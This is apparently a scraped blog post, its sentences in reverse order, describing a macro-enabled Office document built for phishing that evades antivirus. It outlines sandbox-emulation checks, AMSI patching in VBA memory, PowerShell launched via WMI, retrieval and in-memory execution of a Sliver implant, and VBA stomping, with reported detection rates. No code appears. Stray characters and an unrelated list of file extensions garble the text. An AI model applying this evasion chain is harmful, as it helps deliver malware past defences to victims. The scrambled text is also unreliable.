In this case, if we know ahead of time the file path that the document will be executed from, we can use this to determine if we're running in an anti-virus engine. However, if the active document name does not match the name of the document we specify, then the check fails and we exit the subroutine. ![]() Again, we use our PowerShell script to encrypt the static string that is the document name and call our Joy function to decrypt it at run time. This test simply checks to see if our payload is being run by a document with the same name as the original. Many times, if an anti-virus engine is emulating the execution of a VBA macro it may change the name of the document or append some number to it so multiple runs are logged with some uniqueness. I created three simple tests to perform that will run at the start of the macro execution to prevent anything malicious from being executed if we detect we're in an emulated environment.įirst, we start with the Document Name test. These are simply attempts to prevent heuristics-based Anti-Virus engines from flagging our payload as malicious. Emulation Checksīefore we get into patching AMSI in VBA, we'll go over some simple tests you can perform in an attempt to detect whether your VBA is running in an emulated environment and if so, stop the macro from executing anything malicious. ![]() Import Windows APIs -> Check for emulation before running -> Obfuscate AMSI-related function strings, -> Identify addresses of "AmsiScanBuffer" and "AmsiScanString" functions relative to "AmsiUacInitialize" Function -> Patch AMSI in VBA memory -> Decode custom-obfuscated PoSH commands -> Instantiate powershell.exe process via WMI Object -> Disable AMSI in PoSH -> Retrieve Stage 1 PoSH shellcode runner -> Shellcode runner retrieves Sliver implant bytecode, loads in memory, and executes -> VBA stomped with EvilClippy so VBA source is non-malicious. The following flow represents the code I ended up with. I wanted to create an obfuscated, macro-enabled Office document that retrieves and executes a Sliver implant without triggering antivirus/EDR. This blog post will be a summary of a recent macro I made and the research that inspired the decisions that built the macro. To start, this article assumes you have the basics of VBA down and know that executing macros in Microsoft documents can lead to unwanted actions on your device. This has slowly risen to 5 as the engines always evolve. Over the course of tweaking it, I got the detection down to 2 of 20 on in the end. Conversely, if you do know what you're up against, then you only need to worry about that engine. Although this is less than half of the engines it tests for, this is still relatively high if you don't know what you're up against before you perform your phishing campaign. On the original file was detected at the lowest 7 out of 20 detection rates. On my macro creation journey, I initially found that my macro-enabled document had a very high detection rate no matter what I tried doing to bypass AV engines. Both certifications have their positives and negatives. I am taking this certification course after taking the eCPTXv2 and I am still learning a lot of topics that weren't covered in the eCPTXv2. If you're looking for your next cyber security knowledge binge, I'd highly recommend the OSEP. The OSEP certification inspired a lot of the content you'll see here and gave me a base to work up from. I was working on my OSEP certification when I was inspired to stop studying for a bit to deep-dive into malicious word documents. msc MicrosoftManagementConsoleSnap-inControlFile(Microsoft). mdw AccessWorkgroupInformation(Microsoft). mdb AccessApplication(Microsoft),'MDBAccessDatabase(Microsoft). mda AccessAdd-in(Microsoft),'MDAAccess2Workgroup(Microsoft). its InternetDocumentSet,'InternationTranslation. isp IISInternetServiceProviderSettings(Microsoft). ![]() ins IISInternetCommunicationsSettings(Microsoft). cpl WindowsControlPanelExtension(Microsoft). cmd DOSCommandFile,'CommandFileforWindowsNT.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |